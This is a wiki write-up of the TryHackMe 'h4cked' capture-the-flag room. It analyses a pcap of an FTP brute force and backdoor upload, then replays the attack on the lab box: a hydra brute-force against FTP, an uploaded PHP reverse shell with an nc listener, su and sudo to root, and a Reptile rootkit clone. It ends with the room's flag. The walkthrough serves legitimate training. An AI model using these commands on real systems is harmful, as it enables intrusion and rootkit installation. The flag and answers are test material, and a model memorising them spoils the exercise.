TryHackMe-h4cked

From aldeid
Jump to navigation Jump to search

Find out what happened by analysing a .pcap file and hack your way back into the machine

It seems like our machine got hacked by an anonymous threat actor. However, we are lucky to have a .pcap file from the attack. Can you determine what happened? Download the .pcap file and use Wireshark to view it.

Task 1 Oh no! We’ve been hacked!

The attacker is trying to log into a specific service. What service is this?

Open the pcapng file in Wireshark and go to Statistics > Protocol Hierarchy. It will reveal that the application layer is FTP.

Answer: FTP

There is a very popular tool by Van Hauser which can be used to brute force a series of services. What is the name of this tool?

Answer: hydra

The attacker is trying to log on with a specific username. What is the username?

Right click on the 1st frame and follow the TCP stream to reveal the following content:

220 Hello FTP World!
USER jenny
331 Please specify the password.
PASS password
530 Login incorrect.
USER jenny
331 Please specify the password.
PASS 666666
530 Login incorrect.

The attacker keeps brute forcing jenny’s account.

Answer: jenny

What is the user’s password?

In Wireshark, filter the frames that match the FTP protocol only by entering “FTP” in the search bar. Scroll down until you see “Response: 230 Login successful.” (frame #395). Right click on the frame and follow the TCP stream:

220 Hello FTP World!
USER jenny
331 Please specify the password.
PASS password123
230 Login successful.
SYST
215 UNIX Type: L8
PWD
257 "/var/www/html" is the current directory
PORT 192,168,0,147,225,49
200 PORT command successful. Consider using PASV.
LIST -la
150 Here comes the directory listing.
226 Directory send OK.
TYPE I
200 Switching to Binary mode.
PORT 192,168,0,147,196,163
200 PORT command successful. Consider using PASV.
STOR shell.php
150 Ok to send data.
226 Transfer complete.
SITE CHMOD 777 shell.php
200 SITE CHMOD command ok.
QUIT
221 Goodbye.

Answer: password123

What is the current FTP working directory after the attacker logged in?

The current working directory is shown in the same stream as above.

Answer: /var/www/html

The attacker uploaded a backdoor. What is the backdoor’s filename?

Information still on the same TCP stream.

Answer; shell.php

The backdoor can be downloaded from a specific URL, as it is located inside the uploaded file. What is the full URL?

At the bottom of the TCP stream window, use the arrow to navigate to the other streams and go 2 streams forward (stream #18) to reveal the content of the shell.php script. This is a famous PHP reverse shell hosted by pentestmonkey, and going through the comments in the file will reveal the URL where the script is hosted.

Answer: http://pentestmonkey.net/tools/php-reverse-shell

Which command did the attacker manually execute after getting a reverse shell?

Navigate to stream #20 to reveal the below content:

Linux wir3 4.15.0-135-generic #139-Ubuntu SMP Mon Jan 18 17:38:24 UTC 2021 x86_64 x86_64 x86_64 GNU/Linux
 22:26:54 up  2:21,  1 user,  load average: 0.02, 0.07, 0.08
USER     TTY      FROM             LOGIN@   IDLE   JCPU   PCPU WHAT
jenny    tty1     -                20:06   37.00s  1.00s  0.14s -bash
uid=33(www-data) gid=33(www-data) groups=33(www-data)
/bin/sh: 0: can't access tty; job control turned off
$ whoami
www-data
$ ls -la
total 1529956
drwxr-xr-x  23 root root       4096 Feb  1 19:52 .
drwxr-xr-x  23 root root       4096 Feb  1 19:52 ..
drwxr-xr-x   2 root root       4096 Feb  1 20:11 bin
drwxr-xr-x   3 root root       4096 Feb  1 20:15 boot
drwxr-xr-x  18 root root       3880 Feb  1 20:05 dev
drwxr-xr-x  94 root root       4096 Feb  1 22:23 etc
drwxr-xr-x   3 root root       4096 Feb  1 20:05 home
lrwxrwxrwx   1 root root         34 Feb  1 19:52 initrd.img -> boot/initrd.img-4.15.0-135-generic
lrwxrwxrwx   1 root root         33 Jul 25  2018 initrd.img.old -> boot/initrd.img-4.15.0-29-generic
drwxr-xr-x  22 root root       4096 Feb  1 22:06 lib
drwxr-xr-x   2 root root       4096 Feb  1 20:08 lib64
drwx------   2 root root      16384 Feb  1 19:49 lost+found
drwxr-xr-x   2 root root       4096 Jul 25  2018 media
drwxr-xr-x   2 root root       4096 Jul 25  2018 mnt
drwxr-xr-x   2 root root       4096 Jul 25  2018 opt
dr-xr-xr-x 117 root root          0 Feb  1 20:23 proc
drwx------   3 root root       4096 Feb  1 22:20 root
drwxr-xr-x  29 root root       1040 Feb  1 22:23 run
drwxr-xr-x   2 root root      12288 Feb  1 20:11 sbin
drwxr-xr-x   4 root root       4096 Feb  1 20:06 snap
drwxr-xr-x   3 root root       4096 Feb  1 20:07 srv
-rw-------   1 root root 1566572544 Feb  1 19:52 swap.img
dr-xr-xr-x  13 root root          0 Feb  1 20:05 sys
drwxrwxrwt   2 root root       4096 Feb  1 22:25 tmp
drwxr-xr-x  10 root root       4096 Jul 25  2018 usr
drwxr-xr-x  14 root root       4096 Feb  1 21:54 var
lrwxrwxrwx   1 root root         31 Feb  1 19:52 vmlinuz -> boot/vmlinuz-4.15.0-135-generic
lrwxrwxrwx   1 root root         30 Jul 25  2018 vmlinuz.old -> boot/vmlinuz-4.15.0-29-generic
$ python3 -c 'import pty; pty.spawn("/bin/bash")'
www-data@wir3:/$ su jenny
su jenny
Password: password123

jenny@wir3:/$ sudo -l
sudo -l
[sudo] password for jenny: password123

Matching Defaults entries for jenny on wir3:
    env_reset, mail_badpass,
    secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin

User jenny may run the following commands on wir3:
    (ALL : ALL) ALL
jenny@wir3:/$ sudo su
sudo su
root@wir3:/# whoami
whoami
root
root@wir3:/# cd
cd
root@wir3:~# git clone https://github.com/f0rb1dd3n/Reptile.git
git clone https://github.com/f0rb1dd3n/Reptile.git
Cloning into 'Reptile'...
remote: Enumerating objects: 217, done..[K
remote: Counting objects:   0% (1/217).[K
remote: Counting objects:   1% (3/217).[K
remote: Counting objects:   2% (5/217).[K
remote: Counting objects:   3% (7/217).[K
remote: Counting objects:   4% (9/217).[K
remote: Counting objects:   5% (11/217).[K

[REDACTED]

Resolving deltas:  98% (491/499)   
Resolving deltas:  99% (495/499)   
Resolving deltas: 100% (499/499)   
Resolving deltas: 100% (499/499), done.
root@wir3:~# cd Reptile
cd Reptile
root@wir3:~/Reptile# ls -la
ls -la
total 44
drwxr-xr-x 7 root root 4096 Feb  1 22:27 .
drwx------ 4 root root 4096 Feb  1 22:27 ..
drwxr-xr-x 2 root root 4096 Feb  1 22:27 configs
drwxr-xr-x 8 root root 4096 Feb  1 22:27 .git
-rw-r--r-- 1 root root    8 Feb  1 22:27 .gitignore
-rw-r--r-- 1 root root 1922 Feb  1 22:27 Kconfig
drwxr-xr-x 7 root root 4096 Feb  1 22:27 kernel
-rw-r--r-- 1 root root 1852 Feb  1 22:27 Makefile
-rw-r--r-- 1 root root 2183 Feb  1 22:27 README.md
drwxr-xr-x 4 root root 4096 Feb  1 22:27 scripts
drwxr-xr-x 6 root root 4096 Feb  1 22:27 userland
root@wir3:~/Reptile# make
make
make[1]: Entering directory '/root/Reptile/userland'
Makefile:10: ../.config: No such file or directory
make[1]: *** No rule to make target '../.config'.  Stop.
make[1]: Leaving directory '/root/Reptile/userland'
Makefile:56: recipe for target 'userland_bin' failed
make: *** [userland_bin] Error 2
root@wir3:~/Reptile# 

The first command that the attacker entered was whoami.

What is the computer’s hostname?

This information is revealed in this banner:

Linux wir3 4.15.0-135-generic #139-Ubuntu SMP Mon Jan 18 17:38:24 UTC 2021 x86_64 x86_64 x86_64 GNU/Linux

Answer: wir3

Which command did the attacker execute to spawn a new TTY shell?

Answer: python3 -c 'import pty; pty.spawn("/bin/bash")'

Which command was executed to gain a root shell?

The following lines will answer the question:

jenny@wir3:/$ sudo su
sudo su
root@wir3:/# whoami
whoami
root

Answer: sudo su

The attacker downloaded something from GitHub. What is the name of the GitHub project?

The attacker is downloading a content from github:

root@wir3:~# git clone https://github.com/f0rb1dd3n/Reptile.git

Answer: Reptile

The project can be used to install a stealthy backdoor on the system. It can be very hard to detect. What is this type of backdoor called?

Answer: rootkit

Hack your way back into the machine

The attacker has changed the user’s password! Can you replicate the attacker’s steps and read the flag.txt? The flag is located in the /root/Reptile directory. Remember, you can always look back at the .pcap file if necessary. Good luck!

Run Hydra (or any similar tool) on the FTP service. The attacker might not have chosen a complex password. You might get lucky if you use a common word list.

First thing is to scan the target. there are 2 open ports, 1 of which is FTP.

PORT   STATE SERVICE VERSION
21/tcp open  ftp     vsftpd 2.0.8 or later
80/tcp open  http    Apache httpd 2.4.29 ((Ubuntu))
|_http-server-header: Apache/2.4.29 (Ubuntu)
|_http-title: Apache2 Ubuntu Default Page: It works

Let’s replicate the hydra attack we’ve analyzed previously:

kali@kali:/data/hacked/files$ hydra -l jenny -P /usr/share/wordlists/rockyou.txt ftp://10.10.255.63
Hydra v9.1 (c) 2020 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).

Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2021-05-04 07:51:28
[DATA] max 16 tasks per 1 server, overall 16 tasks, 14344399 login tries (l:1/p:14344399), ~896525 tries per task
[DATA] attacking ftp://10.10.255.63:21/
[21][ftp] host: 10.10.255.63   login: jenny   password: 987654321
1 of 1 target successfully completed, 1 valid password found
Hydra (https://github.com/vanhauser-thc/thc-hydra) finished at 2021-05-04 07:51:53

Jenny’s password is 987654321

Change the necessary values inside the web shell and upload it to the webserver

Connect as jenny. You’ll notice that we have write access to the folder. Download the PHP reverse shell from pentestmonkey modify the IP and port, and upload it to the server.

kali@kali:/data/hacked/files$ ftp 10.10.255.63
Connected to 10.10.255.63.
220 Hello FTP World!
Name (10.10.255.63:kali): jenny
331 Please specify the password.
Password: 987654321
230 Login successful.
Remote system type is UNIX.
Using binary mode to transfer files.
ftp> ls -la
200 PORT command successful. Consider using PASV.
150 Here comes the directory listing.
drwxr-xr-x    2 1000     1000         4096 Feb 01 22:26 .
drwxr-xr-x    3 0        0            4096 Feb 01 21:54 ..
-rw-r--r--    1 1000     1000        10918 Feb 01 21:54 index.html
-rwxrwxrwx    1 1000     1000         5493 Feb 01 22:26 shell.php
226 Directory send OK.
ftp> 

Now, let’s upload our reverse shell and give it all privileges:

ftp> put rev.php 
local: rev.php remote: rev.php
200 PORT command successful. Consider using PASV.
150 Ok to send data.
226 Transfer complete.
5492 bytes sent in 0.00 secs (106.8894 MB/s)
ftp> chmod 777 rev.php
200 SITE CHMOD command ok.

Create a listener on the designated port on your attacker machine. Execute the web shell by visiting the .php file on the targeted web server.

Let’s start a listener on port 4444 (or whatever port you have specified in the PHP reverse shell).

kali@kali:/data/hacked/files$ rlwrap nc -nlvp 4444
listening on [any] 4444 ...

And call our reverse shell:

kali@kali:/data/hacked/files$ curl -s http://10.10.255.63/rev.php

You should now have a reverse shell.

kali@kali:/data/hacked/files$ rlwrap nc -nlvp 4444
listening on [any] 4444 ...
connect to [10.8.50.72] from (UNKNOWN) [10.10.255.63] 48734
Linux wir3 4.15.0-135-generic #139-Ubuntu SMP Mon Jan 18 17:38:24 UTC 2021 x86_64 x86_64 x86_64 GNU/Linux
 06:12:03 up 57 min,  0 users,  load average: 0.00, 0.00, 0.00
USER     TTY      FROM             LOGIN@   IDLE   JCPU   PCPU WHAT
uid=33(www-data) gid=33(www-data) groups=33(www-data)
/bin/sh: 0: can't access tty; job control turned off
python3 -c "import pty;pty.spawn('/bin/bash')"
www-data@wir3:/$ id
id
uid=33(www-data) gid=33(www-data) groups=33(www-data)

Become root!

Once connected as www-data, we want to move laterally to jenny using the password found previously (same password as for FTP).

www-data@wir3:/$ su jenny
Password: 987654321

jenny@wir3:/$ 

Now, we check jenny’s privileges and see that we can become root:

jenny@wir3:/$ sudo -l
[sudo] password for jenny: 987654321

Matching Defaults entries for jenny on wir3:
    env_reset, mail_badpass,
    secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin

User jenny may run the following commands on wir3:
    (ALL : ALL) ALL
jenny@wir3:/$ sudo -s
root@wir3:/# 

Read the flag.txt file inside the Reptile directory

root@wir3:/# cd /root
root@wir3:/# ls -la
ls -la
total 20
drwx------  3 root root 4096 Feb  2 10:23 .
drwxr-xr-x 22 root root 4096 Feb  2 10:28 ..
lrwxrwxrwx  1 root root    9 Feb  2 10:20 .bash_history -> /dev/null
-rw-r--r--  1 root root 3106 Apr  9  2018 .bashrc
-rw-r--r--  1 root root  148 Aug 17  2015 .profile
drwxr-xr-x  7 root root 4096 Feb  2 10:23 Reptile
root@wir3:/# cd Reptile
cd Reptile
root@wir3:/# ls -la
ls -la
total 44
drwxr-xr-x 7 root root 4096 Feb  2 10:23 .
drwx------ 3 root root 4096 Feb  2 10:23 ..
drwxr-xr-x 2 root root 4096 Feb  1 22:27 configs
-rw-r--r-- 1 root root   33 Feb  2 10:23 flag.txt
-rw-r--r-- 1 root root 1922 Feb  1 22:27 Kconfig
drwxr-xr-x 7 root root 4096 Feb  1 22:27 kernel
-rw-r--r-- 1 root root 1852 Feb  1 22:27 Makefile
drwxr-xr-x 2 root root 4096 Feb  1 22:28 output
-rw-r--r-- 1 root root 2183 Feb  1 22:27 README.md
drwxr-xr-x 4 root root 4096 Feb  1 22:27 scripts
drwxr-xr-x 6 root root 4096 Feb  1 22:27 userland
root@wir3:/# cat flag.txt
cat flag.txt
ebcefd66ca4b559d17b440b6e67fd0fd

Root flag: ebcefd66ca4b559d17b440b6e67fd0fd